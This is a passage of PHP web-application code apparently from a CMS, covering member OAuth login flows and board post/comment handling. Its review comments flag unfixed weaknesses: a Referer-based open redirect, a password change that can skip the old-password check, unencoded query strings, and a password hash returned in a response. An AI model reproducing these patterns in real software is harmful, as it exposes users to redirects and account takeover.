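            $values->name = Request('name') ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error'));
            $values->nickname = Request('nickname') ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error'));

            if ($this->isLogged() == false) {
                $results->success = false;
                // Fix: was the misspelled getLangauge().
                $results->message = $this->getLanguage('error/notLogged');
            } elseif (count($errors) == 0) {
                $insert = array();
                $insert['name'] = $values->name;
                $insert['nickname'] = $values->nickname;
                $this->db()->update($this->table->member, $insert)->where('idx', $this->getLogged())->execute();
                $results->success = true;
                $results->message = $this->getLanguage('modify/success');
            } else {
                $results->success = false;
                $results->errors = $errors;
            }
        }
    }

    if ($action == 'password') {
        $errors = array();
        $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error'));
        if (strlen(Request('password')) < 4 || Request('password') !== Request('password_confirm')) {
            $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error');
        }

        if ($this->isLogged() == false) {
            $results->success = false;
            // Fix: was the misspelled getLangauge().
            $results->message = $this->getLanguage('error/notLogged');
        } else {
            $mHash = new Hash();

            // The current password is only demanded when the stored hash is 65 characters long.
            // NOTE(review): presumably other lengths mean "no usable password yet" (e.g. a
            // social-login account) — confirm, because for those accounts a session alone is
            // enough to set a password.
            if (strlen($this->getMember()->password) == 65) {
                $old_password = Request('old_password');
                if ($old_password == '' || $mHash->password_validate($old_password, $this->getMember()->password) == false) {
                    $errors['old_password'] = $this->getLanguage('password/help/old_password/error');
                }
            }

            if (count($errors) == 0) {
                $password = $mHash->password_hash($password);
                $this->db()->update($this->table->member, array('password' => $password))->where('idx', $this->getLogged())->execute();
                $results->success = true;
                $results->message = $this->getLanguage('password/success');
            } else {
                $results->success = false;
                $results->errors = $errors;
            }
        }
    }

    // OAuth entry points. Each one loads the provider credentials for this domain, remembers
    // where to return to, runs the authorization-code exchange through OAuthClient, and then
    // hands the profile to socialLogin() (or, for 'youtube', stores the tokens).
    // NOTE(review): the return URL is taken from the Referer header without checking that it
    // points at this site; validate it before redirecting. Presumably printError() ends the
    // request, since the code after it dereferences $OAUTH / $data — confirm.

    if ($action == 'facebook') {
        $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne();
        if ($OAUTH == null) {
            $this->IM->printError('OAUTH_DOMAIN_ERROR');
        }

        $CLIENT_ID = $OAUTH->client_id;
        $CLIENT_SECRET = $OAUTH->client_secret;
        $AUTH_URL = 'https://graph.facebook.com/oauth/authorize';
        $TOKEN_URL = 'https://graph.facebook.com/oauth/access_token';

        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            // Fall back to the site root when the browser sent no Referer.
            $_SESSION['SOCIAL_REDIRECT_URL'] = isset($_SERVER['HTTP_REFERER']) == true ? $_SERVER['HTTP_REFERER'] : '/';
        }

        $facebook = new OAuthClient();
        $facebook->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('public_profile,email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($facebook->authenticate($_GET['code']) == true) {
                $redirectUrl = $facebook->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($facebook->getAccessToken() == null) {
            $authUrl = $facebook->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $facebook->get('https://graph.facebook.com/me', array('fields' => 'id,email,name'));
        if ($data === false || empty($data->email) == true) {
            $this->IM->printError('OAUTH_API_ERROR');
        }

        $accessToken = $facebook->getAccessToken();
        $refreshToken = $facebook->getRefreshToken() == null ? '' : $facebook->getRefreshToken();

        $this->socialLogin('facebook', $data->id, $data->name, $data->email, 'https://graph.facebook.com/' . $data->id . '/picture?width=250&height=250', $accessToken, $refreshToken);
    }

    if ($action == 'google') {
        $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne();
        if ($OAUTH == null) {
            $this->IM->printError('OAUTH_DOMAIN_ERROR');
        }

        $CLIENT_ID = $OAUTH->client_id;
        $CLIENT_SECRET = $OAUTH->client_secret;
        $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth';
        $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token';

        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = isset($_SERVER['HTTP_REFERER']) == true ? $_SERVER['HTTP_REFERER'] : '/';
        }

        $google = new OAuthClient();
        $google->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($google->authenticate($_GET['code']) == true) {
                $redirectUrl = $google->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($google->getAccessToken() == null) {
            $authUrl = $google->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $google->get('https://www.googleapis.com/plus/v1/people/me');
        if ($data === false || empty($data->emails) == true) {
            $this->IM->printError('OAUTH_API_ERROR');
        }

        // Use the address flagged as the account's own e-mail.
        for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) {
            if ($data->emails[$i]->type == 'account') {
                $data->email = $data->emails[$i]->value;
                break;
            }
        }
        $data->photo = str_replace('sz=50', 'sz=250', $data->image->url);

        $accessToken = $google->getAccessToken();
        $refreshToken = $google->getRefreshToken() == null ? '' : $google->getRefreshToken();

        $this->socialLogin('google', $data->id, $data->displayName, $data->email, $data->photo, $accessToken, $refreshToken);
    }

    if ($action == 'youtube') {
        $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne();
        if ($OAUTH == null) {
            $this->IM->printError('OAUTH_DOMAIN_ERROR');
        }

        $CLIENT_ID = $OAUTH->client_id;
        $CLIENT_SECRET = $OAUTH->client_secret;
        $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth';
        $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token';

        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = isset($_SERVER['HTTP_REFERER']) == true ? $_SERVER['HTTP_REFERER'] : '/';
        }

        // Linking a YouTube account only makes sense for an existing session.
        if ($this->isLogged() == false) {
            die($this->getError('NOT_LOGGED'));
        }

        $youtube = new OAuthClient();
        $youtube->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/youtube https://www.googleapis.com/auth/youtube.upload https://www.googleapis.com/auth/youtubepartner https://www.googleapis.com/auth/youtube.force-ssl')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($youtube->authenticate($_GET['code']) == true) {
                $redirectUrl = $youtube->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($youtube->getAccessToken() == null) {
            $authUrl = $youtube->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $youtube->get('https://www.googleapis.com/plus/v1/people/me');
        if ($data === false || empty($data->emails) == true) {
            $this->IM->printError('OAUTH_API_ERROR');
        }

        for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) {
            if ($data->emails[$i]->type == 'account') {
                $data->email = $data->emails[$i]->value;
                break;
            }
        }

        $accessToken = $youtube->getAccessToken();
        $refreshToken = $youtube->getRefreshToken() == null ? '' : $youtube->getRefreshToken();

        // Store (or refresh) the tokens for the logged-in member instead of logging in.
        $check = $this->db()->select($this->table->social_token)->where('midx', $this->getLogged())->where('code', 'youtube')->getOne();
        if ($check == null) {
            $this->db()->insert($this->table->social_token, array('midx' => $this->getLogged(), 'code' => 'youtube', 'user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->execute();
        } else {
            $this->db()->update($this->table->social_token, array('user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->where('midx', $this->getLogged())->where('code', 'youtube')->execute();
        }

        unset($_SESSION['OAUTH_ACCESS_TOKEN']);
        unset($_SESSION['OAUTH_REFRESH_TOKEN']);

        $redirectUrl = Request('SOCIAL_REDIRECT_URL', 'session') != null ? Request('SOCIAL_REDIRECT_URL', 'session') : '/';
        unset($_SESSION['SOCIAL_REDIRECT_URL']);
        header('location:' . $redirectUrl);
    }

    if ($action == 'github') {
        $OAUTH = $this->db()->select($this->table->social_oauth)->where('domain', $this->IM->domain)->where('code', $action)->getOne();
        if ($OAUTH == null) {
            $this->IM->printError('OAUTH_DOMAIN_ERROR');
        }

        $CLIENT_ID = $OAUTH->client_id;
        $CLIENT_SECRET = $OAUTH->client_secret;
        $AUTH_URL = 'https://github.com/login/oauth/authorize';
        $TOKEN_URL = 'https://github.com/login/oauth/access_token';

        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = isset($_SERVER['HTTP_REFERER']) == true ? $_SERVER['HTTP_REFERER'] : '/';
        }

        $github = new OAuthClient();
        $github->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setAuthUrl($AUTH_URL)->setScope('user')->setAccessType('offline')->setUserAgent('Awesome-Octocat-App')->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($github->authenticate($_GET['code']) == true) {
                $redirectUrl = $github->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($github->getAccessToken() == null) {
            $authUrl = $github->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $github->get('https://api.github.com/user');
        if ($data === false || empty($data->email) == true) {
            $this->IM->printError('OAUTH_API_ERROR');
        }

        $accessToken = $github->getAccessToken();
        $refreshToken = $github->getRefreshToken() == null ? '' : $github->getRefreshToken();

        $this->socialLogin('github', $data->id, $data->name, $data->email, $data->avatar_url, $accessToken, $refreshToken);
    }

    $this->IM->fireEvent('afterDoProcess', 'member', $action, $values, $results);

    return $results;
}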
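/**
 * Runs one board-module action and returns its result object.
 *
 * The action name selects exactly one of the branches below: listUrl,
 * postWrite, postModify, postDelete, mentModify, getMent, getMentDepth,
 * mentWrite, mentDelete, vote or delete. Input is read through Request(),
 * so every value taken from it is caller-controlled. After the branch has
 * run, the 'afterDoProcess' event is fired with the collected $values and
 * $results.
 *
 * Authorization model visible in this method: a member may change or remove
 * their own article (midx equals the logged-in member), holders of the
 * post_modify / post_delete / ment_modify / ment_delete permission may act on
 * any article, and guest articles (midx == 0) are protected by the password
 * stored with the article.
 *
 * @param string $action Name of the action to run.
 * @return stdClass Result object; always carries `success` for a known action,
 *                  plus action-specific fields (message, errors, url, redirect,
 *                  modalHtml, ...).
 */
function doProcess($action)
{
    $results = new stdClass();
    $values = new stdClass();

    if ($action == 'listUrl') {
        $menu = Request('menu');
        $page = Request('page');
        $page = $this->IM->getPages($menu, $page);

        // Previous filter state, sent back by the client.
        $oKey = Request('oKey');
        $oKeyword = Request('oKeyword');
        $oCategory = Request('oCategory');
        $oSort = Request('oSort');
        $oDirection = Request('oDirection');

        // Requested filter state.
        $key = Request('key');
        $keyword = Request('keyword');
        $category = Request('category');
        $sort = Request('sort');
        $direction = Request('direction');
        $p = Request('p') ? Request('p') : 1;

        // NOTE(review): request values are concatenated without URL-encoding; a keyword
        // containing '&' or '#' changes the query structure. getQueryString() is not
        // visible here - confirm it encodes, or encode each value before joining.
        $queryString = 'menu=' . $page->menu . '&page=' . $page->page . '&key=' . $key . '&keyword=' . $keyword
            . '&category=' . $category . '&sort=' . $sort . '&direction=' . $direction . '&p=' . $p;

        // Any change of filter sends the list back to its first page.
        if ($oKey != $key || $oKeyword != $keyword || $oCategory != $category || $oSort != $sort || $oDirection != $direction) {
            $p = 1;
        }

        // Values equal to the defaults are passed as empty strings in $default.
        $default = array();
        if (strlen($keyword) == 0) {
            $default['key'] = '';
            $default['keyword'] = '';
        }
        if ($sort == 'idx' && $direction == 'desc') {
            $default['sort'] = $default['direction'] = '';
        }
        if (isset($page->context->config->category) == true && $page->context->config->category == $category) {
            $default['category'] = '';
        }

        $url = $this->IM->getUrl($page->menu, $page->page, 'list', $p) . $this->IM->getQueryString($default, $queryString);
        $results->success = true;
        $results->url = $url;
    }

    if ($action == 'postWrite') {
        $values->errors = array();
        $values->idx = Request('idx');
        $values->bid = Request('bid');
        $values->menu = Request('menu');
        $values->page = Request('page');
        $values->category = Request('category');
        $values->title = Request('title')
            ? Request('title')
            : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error'));
        $values->content = Request('content')
            ? Request('content')
            : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error'));

        // Privileged flags are honoured only when the caller holds the matching permission.
        $values->is_notice = Request('is_notice') && $this->checkPermission('notice') == true ? 'TRUE' : 'FALSE';
        $values->is_html_title = Request('is_html_title') && $this->checkPermission('html_title') == true ? 'TRUE' : 'FALSE';
        $values->is_secret = Request('is_secret') ? 'TRUE' : 'FALSE';
        // NOTE(review): this is the only call that uses $this->getModule() instead of
        // $this->IM->getModule(); kept as written - confirm both resolve to the same module.
        $values->is_hidename = Request('is_hidename') && $this->getModule('member')->isLogged() == true ? 'TRUE' : 'FALSE';

        if ($this->IM->getModule('member')->isLogged() == false) {
            // Guests must supply a name and a password; the password later gates edit and delete.
            $values->name = Request('name')
                ? Request('name')
                : ($values->errors['name'] = $this->getLanguage('postWrite/help/name/error'));
            $values->password = Request('password')
                ? Request('password')
                : ($values->errors['password'] = $this->getLanguage('postWrite/help/password/error'));
            $values->email = Request('email');
            $values->midx = 0;
        } else {
            // Members: identity comes from the session, never from the request.
            $values->name = $this->IM->getModule('member')->getMember()->nickname;
            $values->password = '';
            $values->email = $this->IM->getModule('member')->getMember()->email;
            $values->midx = $this->IM->getModule('member')->getLogged();
        }

        $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array();
        for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) {
            $values->attachments[$i] = Decoder($values->attachments[$i]);
        }

        $values->content = $this->encodeContent($values->content, $values->attachments);

        // NOTE(review): bid comes from the request and is written on both insert and update;
        // no write-permission check for the target board and no null check on getBoard()
        // is visible in this method - confirm both are enforced elsewhere.
        $values->board = $this->getBoard($values->bid);
        if ($values->board->use_category != 'NONE') {
            if ($values->board->use_category == 'FORCE' && ($values->category == null || preg_match('/^[1-9]+[0-9]*$/', $values->category) == false)) {
                $values->errors['category'] = $this->getLanguage('postWrite/help/category/error');
            }
        } else {
            $values->category = 0;
        }

        if (empty($values->errors) == true) {
            $results->success = true;

            $mHash = new Hash();

            $insert = array();
            $insert['bid'] = $values->bid;
            $insert['category'] = $values->category;
            $insert['title'] = $values->title;
            $insert['content'] = $values->content;
            $insert['search'] = GetString($values->content, 'index');
            $insert['is_notice'] = $values->is_notice;
            $insert['is_html_title'] = $values->is_html_title;
            $insert['is_secret'] = $values->is_secret;
            $insert['is_hidename'] = $values->is_hidename;

            if ($values->idx == null) {
                // New post.
                $post = null;
                $insert['midx'] = $values->midx;
                $insert['name'] = $values->name;
                // Only the hash is stored; the plaintext is never placed in the row data.
                $insert['password'] = $values->password ? $mHash->password_hash($values->password) : '';
                $insert['email'] = $values->email;
                $insert['reg_date'] = $insert['last_ment'] = time();
                $insert['ip'] = $_SERVER['REMOTE_ADDR'];

                $values->idx = $this->db()->insert($this->table->post, $insert)->execute();

                if ($this->IM->getModule('member')->isLogged() == true) {
                    $this->IM->getModule('member')->sendPoint(null, $values->board->post_point, 'board', 'post', array('idx' => $values->idx));
                    $this->IM->getModule('member')->addActivity(null, $values->board->post_exp, 'board', 'post', array('idx' => $values->idx));
                }
            } else {
                // Edit of an existing post.
                $post = $this->getPost($values->idx);

                if ($post == null) {
                    // A missing post used to fall through to property reads on null.
                    $results->success = false;
                    $results->message = $this->getLanguage('error/notFound');
                } elseif ($this->checkPermission('post_modify') == false) {
                    if ($post->midx != 0 && $post->midx != $this->IM->getModule('member')->getLogged()) {
                        // Someone else's member post.
                        $results->success = false;
                        $results->message = $this->getLanguage('error/forbidden');
                    } elseif ($post->midx == 0) {
                        // Guest post: the stored password is the only proof of ownership.
                        if ($mHash->password_validate($values->password, $post->password) == false) {
                            $results->success = false;
                            $results->errors = array('password' => $this->getLanguage('error/incorrectPassword'));
                            $results->message = $this->getLanguage('error/incorrectPassword');
                        }
                    }
                }

                if ($results->success == true) {
                    // Guest identity fields are rewritten only when a guest edits a guest post.
                    if ($post->midx == 0 && $this->IM->getModule('member')->isLogged() == false) {
                        $insert['name'] = $values->name;
                        $insert['password'] = $values->password ? $mHash->password_hash($values->password) : '';
                        $insert['email'] = $values->email;
                        $insert['ip'] = $_SERVER['REMOTE_ADDR'];
                    }

                    $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute();

                    // Tell the author when somebody else changed their post.
                    if ($post->midx != 0 && $post->midx != $this->IM->getModule('member')->getLogged()) {
                        $this->IM->getModule('push')->sendPush($post->midx, 'board', 'post_modify', $post->idx, array('from' => $values->name));
                    }

                    if ($this->IM->getModule('member')->isLogged() == true) {
                        $this->IM->getModule('member')->addActivity(null, 0, 'board', 'post_modify', array('idx' => $values->idx));
                    }
                }
            }

            if ($results->success == true) {
                // Register attachment ids that have no row yet; existing rows are left untouched.
                for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) {
                    if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) {
                        $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'bid' => $values->bid, 'type' => 'POST', 'parent' => $values->idx))->execute();
                    }
                }

                // Recount the category the post left.
                if ($post != null && $post->category != $values->category) {
                    $lastPost = $this->db()->select($this->table->post)->where('category', $post->category)->orderBy('reg_date', 'desc')->get();
                    $postnum = count($lastPost);
                    $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0;
                    $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $post->category)->execute();
                }

                // Recount the category the post entered.
                if ($values->category != 0 && ($post == null || $post->category != $values->category)) {
                    $lastPost = $this->db()->select($this->table->post)->where('category', $values->category)->orderBy('reg_date', 'desc')->get();
                    $postnum = count($lastPost);
                    $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0;
                    $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $values->category)->execute();
                }

                // Recount the board.
                $lastPost = $this->db()->select($this->table->post)->where('bid', $values->bid)->orderBy('reg_date', 'desc')->get();
                $postnum = count($lastPost);
                $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0;
                $this->db()->update($this->table->board, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('bid', $values->bid)->execute();

                $this->IM->setArticle('board', $values->bid, 'post', $values->idx, time());

                // Redirect to the view page; when the current page is bound to another
                // category, use the page that getPostPage() reports for the post.
                $page = $this->IM->getPages($values->menu, $values->page);
                if ($page->context->config == null) {
                    $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->idx);
                } elseif ($page->context->config->category == $values->category) {
                    $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->idx);
                } else {
                    $redirectPage = $this->getPostPage($values->idx);
                    $results->redirect = $this->IM->getUrl($redirectPage->menu, $redirectPage->page, 'view', $values->idx);
                }
            }
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/required');
            $results->errors = $values->errors;
        }
    }

    if ($action == 'postModify') {
        // Pre-check before the edit form is shown: may the caller modify this post?
        $values->idx = Request('idx');
        $values->password = Request('password');

        $post = $this->getPost($values->idx);
        if ($post == null) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notFound');
        } elseif ($this->checkPermission('post_modify') == true || $post->midx != 0 && $post->midx == $this->IM->getModule('member')->getLogged()) {
            $results->success = true;
            $results->permission = true;
        } elseif ($post->midx == 0) {
            if ($values->password === null) {
                // No password sent yet: return the password prompt.
                $results->success = true;
                $results->permission = false;
                $results->modalHtml = $this->getModify('post', $values->idx);
            } else {
                $mHash = new Hash();
                if ($mHash->password_validate($values->password, $post->password) == true) {
                    $results->success = true;
                    $results->permission = true;
                } else {
                    $results->success = false;
                    $results->errors = array('password' => $this->getLanguage('error/incorrectPassword'));
                }
            }
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/forbidden');
        }
    }

    if ($action == 'postDelete') {
        // Returns the confirmation modal only; the removal itself is the 'delete' action,
        // which re-checks permission and, for guest posts, the password.
        $values->idx = Request('idx');

        $post = $this->getPost($values->idx);
        if ($post == null) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notFound');
        } elseif ($this->checkPermission('post_delete') == true || $post->midx == 0 || $post->midx == $this->IM->getModule('member')->getLogged()) {
            $results->success = true;
            $results->modalHtml = $this->getDelete('post', $values->idx);
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/forbidden');
        }
    }

    if ($action == 'mentModify') {
        // Pre-check for editing a comment; on success the comment is returned for the form.
        $values->idx = Request('idx');
        $values->password = Request('password');

        $ment = $this->getMent($values->idx);
        $results->permission = false;
        if ($ment == null) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notFound');
        } elseif ($this->checkPermission('ment_modify') == true || $ment->midx != 0 && $ment->midx == $this->IM->getModule('member')->getLogged()) {
            $results->success = true;
            $results->permission = true;
        } elseif ($ment->midx == 0) {
            if ($values->password === null) {
                $results->success = true;
                $results->permission = false;
                $results->modalHtml = $this->getModify('ment', $values->idx);
            } else {
                $mHash = new Hash();
                if ($mHash->password_validate($values->password, $ment->password) == true) {
                    $results->success = true;
                    $results->permission = true;
                } else {
                    $results->success = false;
                    $results->errors = array('password' => $this->getLanguage('error/incorrectPassword'));
                }
            }
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/forbidden');
        }

        if ($results->permission == true) {
            $ment->content = $this->getArticleContent($ment->content);
            $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get();
            for ($i = 0, $loop = count($attachments); $i < $loop; $i++) {
                $attachments[$i] = $attachments[$i]->idx;
            }
            $ment->attachment = Encoder(json_encode($attachments));
            // NOTE(review): the whole record is returned, and $ment->password (the stored
            // hash validated above) is part of it. Confirm the response layer drops fields
            // the edit form does not need, or return a reduced copy here.
            $results->data = $ment;
        }
    }

    if ($action == 'getMent') {
        $values->get = Request('get');

        if ($values->get == 'page') {
            $values->parent = Request('parent');
            $values->post = $this->getPost($values->parent);
            $values->board = $this->getBoard($values->post->bid);
            $values->mentlimit = $values->board->mentlimit;
            $values->page = Request('page');
            $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit);

            // Walk back to the last page that still holds comments.
            // NOTE(review): page is caller-controlled and every step is one query; a very
            // large page number makes this loop expensive - consider clamping it first.
            if ($values->page > 1 && count($values->ments) == 0) {
                while ($values->page > 1) {
                    $values->page = $values->page - 1;
                    $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit);
                    if (count($values->ments) > 0) {
                        break;
                    }
                }
            }

            if (count($values->ments) == 0) {
                $results->page = null;
                $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>';
            } else {
                $results->page = $values->page;
            }
        } elseif ($values->get == 'idx') {
            $values->idx = Request('idx');
            $ment = $this->getMent($values->idx);

            if ($ment != null) {
                // parent is read only after the null check (it used to be read before it).
                $values->parent = $ment->parent;
                $values->page = $this->getMentPosition($values->idx);
                $values->post = $this->getPost($values->parent);
                $values->board = $this->getBoard($values->post->bid);
                $values->mentlimit = $values->board->mentlimit;
                $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit);
                $results->page = $values->page;
            } else {
                $values->parent = null;
                $results->page = null;
                $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>';
            }
        }

        $results->success = true;
        $results->parent = $values->parent;
        // No post is loaded when the comment was not found; report a count of zero then.
        $results->mentCount = number_format(isset($values->post->ment) == true ? $values->post->ment : 0);
        $results->idxs = array();
        $results->ments = array();
        if (empty($values->mentHtml) == false) {
            $results->mentHtml = $values->mentHtml;
        }

        if ($results->page !== null) {
            for ($i = 0, $loop = count($values->ments); $i < $loop; $i++) {
                $results->ments[$i] = array(
                    'idx' => $values->ments[$i]->idx,
                    'modify_date' => $values->ments[$i]->modify_date,
                    'html' => $this->getMentItem($values->ments[$i]),
                );
                $results->idxs[$i] = $values->ments[$i]->idx;
            }
        }
        $results->pagination = $this->getMentPagination($results->parent, $results->page);
    }

    if ($action == 'getMentDepth') {
        // Reply pre-check: the target must exist, not be deleted, and be shallower than depth 10.
        $idx = Request('idx');
        $parent = $this->getMent($idx);

        if ($parent == null || $parent->is_delete == 'TRUE') {
            $results->success = false;
            $results->message = $this->getLanguage('error/notFound');
        } elseif ($parent->depth >= 10) {
            $results->success = false;
            $results->message = $this->getLanguage('mentWrite/overdepth');
        } else {
            $results->success = true;
            $results->depth = $parent->depth;
            $results->parent = $parent->parent;
            $results->source = $idx;
        }
    }

    if ($action == 'mentWrite') {
        $values->errors = array();
        $values->idx = Request('idx');
        $values->source = Request('source');
        $values->parent = Request('parent');
        // NOTE(review): parent is caller-controlled; neither the post nor the board is
        // null-checked, and on edit the comment is not verified to belong to this parent
        // before 'parent' and 'bid' are rewritten below - confirm upstream validation.
        $values->post = $this->getPost($values->parent);
        $values->board = $this->getBoard($values->post->bid);
        $values->is_secret = Request('is_secret') ? 'TRUE' : 'FALSE';
        $values->is_hidename = Request('is_hidename') && $this->IM->getModule('member')->isLogged() == true ? 'TRUE' : 'FALSE';
        $values->content = Request('content')
            ? Request('content')
            : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error'));

        if ($this->IM->getModule('member')->isLogged() == false) {
            $values->name = Request('name')
                ? Request('name')
                : ($values->errors['name'] = $this->getLanguage('postWrite/help/name/error'));
            $values->password = Request('password')
                ? Request('password')
                : ($values->errors['password'] = $this->getLanguage('postWrite/help/password/error'));
            $values->email = Request('email');
            $values->midx = 0;
        } else {
            $values->name = $this->IM->getModule('member')->getMember()->nickname;
            $values->password = '';
            $values->email = $this->IM->getModule('member')->getMember()->email;
            $values->midx = $this->IM->getModule('member')->getLogged();
        }

        $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array();
        for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) {
            $values->attachments[$i] = Decoder($values->attachments[$i]);
        }

        $results->success = true;

        // A reply needs its source comment to still exist.
        if ($values->source) {
            $sourceData = $this->getMent($values->source);
            if ($sourceData == null) {
                $results->success = false;
                $results->message = $this->getLanguage('mentWrite/deleteSource');
            }
        }

        $values->content = $this->encodeContent($values->content, $values->attachments);

        if ($results->success == true && empty($values->errors) == true) {
            $mHash = new Hash();

            $insert = array();
            $insert['bid'] = $values->post->bid;
            $insert['parent'] = $values->parent;
            $insert['content'] = $values->content;
            $insert['search'] = GetString($values->content, 'index');
            $insert['is_secret'] = $values->is_secret;
            $insert['is_hidename'] = $values->is_hidename;

            if ($values->idx == null) {
                // New comment.
                $insert['midx'] = $values->midx;
                $insert['name'] = $values->name;
                // Only the hash is stored; the plaintext is never placed in the row data.
                $insert['password'] = $values->password ? $mHash->password_hash($values->password) : '';
                $insert['email'] = $values->email;
                $insert['reg_date'] = time();
                $insert['ip'] = $_SERVER['REMOTE_ADDR'];

                $values->idx = $this->db()->insert($this->table->ment, $insert)->execute();

                // Work out the position of the comment in the thread (head / arrange / depth).
                if ($values->source) {
                    $sourceData = $this->getMent($values->source);
                    $head = $sourceData->head;
                    $depth = $sourceData->depth + 1;
                    $source = $sourceData->idx;

                    if ($depth > 1) {
                        // First following entry in the same thread that is not deeper than the source.
                        $depthData = $this->db()->select($this->table->ment_depth)->where('head', $sourceData->head)->where('arrange', $sourceData->arrange, '>')->where('depth', $sourceData->depth, '<=')->orderBy('arrange', 'asc')->getOne();

                        if ($depthData == null) {
                            $arrange = $values->idx;
                        } else {
                            // Take that slot and shift it and everything after it by one.
                            $arrange = $depthData->arrange;
                            $this->db()->update($this->table->ment_depth, array('arrange' => $this->db()->inc()))->where('head', $sourceData->head)->where('arrange', $arrange, '>=')->execute();
                        }
                    } else {
                        $arrange = $values->idx;
                    }
                } else {
                    $head = $values->idx;
                    $arrange = $values->idx;
                    $depth = 0;
                    $source = 0;
                }

                $this->db()->insert($this->table->ment_depth, array('idx' => $values->idx, 'parent' => $values->parent, 'head' => $head, 'arrange' => $arrange, 'depth' => $depth, 'source' => $source))->execute();

                if ($this->IM->getModule('member')->isLogged() == true) {
                    $this->IM->getModule('member')->sendPoint(null, $values->board->ment_point, 'board', 'ment', array('idx' => $values->idx));
                    $this->IM->getModule('member')->addActivity(null, $values->board->ment_exp, 'board', 'ment', array('idx' => $values->idx));
                }

                // Notify the post author and the author of the comment replied to.
                if ($values->post->midx != 0 && $values->post->midx != $this->IM->getModule('member')->getLogged()) {
                    $this->IM->getModule('push')->sendPush($values->post->midx, 'board', 'ment', $values->post->idx, array('idx' => $values->idx, 'from' => $values->name));
                }

                if ($source != 0 && $sourceData->midx != 0 && $sourceData->midx != $this->IM->getModule('member')->getLogged()) {
                    $this->IM->getModule('push')->sendPush($sourceData->midx, 'board', 'replyment', $values->post->idx, array('idx' => $values->idx, 'from' => $values->name));
                }
            } else {
                // Edit of an existing comment.
                $ment = $this->getMent($values->idx);

                if ($ment == null) {
                    // A missing comment used to fall through to property reads on null.
                    $results->success = false;
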